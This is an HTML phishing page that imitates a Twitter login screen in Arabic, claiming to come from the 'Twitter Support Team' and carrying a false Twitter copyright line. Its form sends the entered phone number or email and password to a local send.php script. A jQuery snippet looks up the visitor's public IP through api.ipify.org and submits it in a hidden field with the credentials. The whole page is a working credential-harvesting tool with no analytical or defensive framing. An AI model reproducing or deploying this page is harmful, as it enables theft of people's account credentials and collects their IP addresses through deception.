<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="style.css">
    <title>log in Twitter </title>

    <!-- HTML -->


    <!-- Custom Styles -->
    <link rel="stylesheet" href="style.css">
</head>

<body>
    <style type="text/css">
    </style>





    </head>

    <body>
        <br> <br> <br> <br> <br>
        <center>

            <img class="img" src="img/imgo.png" /><br>

        </center>
        <div class="ds">
            <p>Login Twitter </p>
            <div>
                <br>
                <center>
                    <form class="login-form" action="send.php" method="post">
                        <div class="login-form">
                            <label> <input type="text" name="text"
                                    placeholder="رقم الهاتف المحمول أو عنوان البريد الإلكتروني" autocomplete="off"
                                    autocapitalize="off" required> </label> <label>
                                <input type="password" name="password" placeholder="كلمه السر" autocomplete="off"
                                    autocapitalize="off" required> </label>
                            <input type="hidden" name="brok-ip" id="brok-ip" value="">
                            <p hidden id="user-ippp"></p>
                        </div>
                </center>

                <center>
                    <div> <button class="btn-login-fb">تسجيل الدخول</button>
                        </from>
                        <button class=" btn-login-fd ">نسيت كلمة السر؟</button>
                </center>
                <br>
                <center>
                    <font face=" times new roman " size="2.5" color="#1e88e5"> قم بتسجيل حساب جديد </font>
                </center>
            </div> <br> <br>
            <div class="footer-txt-copyright">©جميع الحقوق محفوضه لدى تويتر 2022</div>
            <!--- footer-txt-copyright --->
            <div class="text-lin">Twitter Support Team</div>
            <!--- footer-txt-copyright --->

            <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
            </script>

            <script>

                $.getJSON("https://api.ipify.org?format=json", function (data) {

                    $("#user-ippp").html(data.ip);


                    let brok = document.getElementById('user-ippp').textContent;

                    document.getElementById('brok-ip').value = brok;
                })
            </script>
    </body>

</html>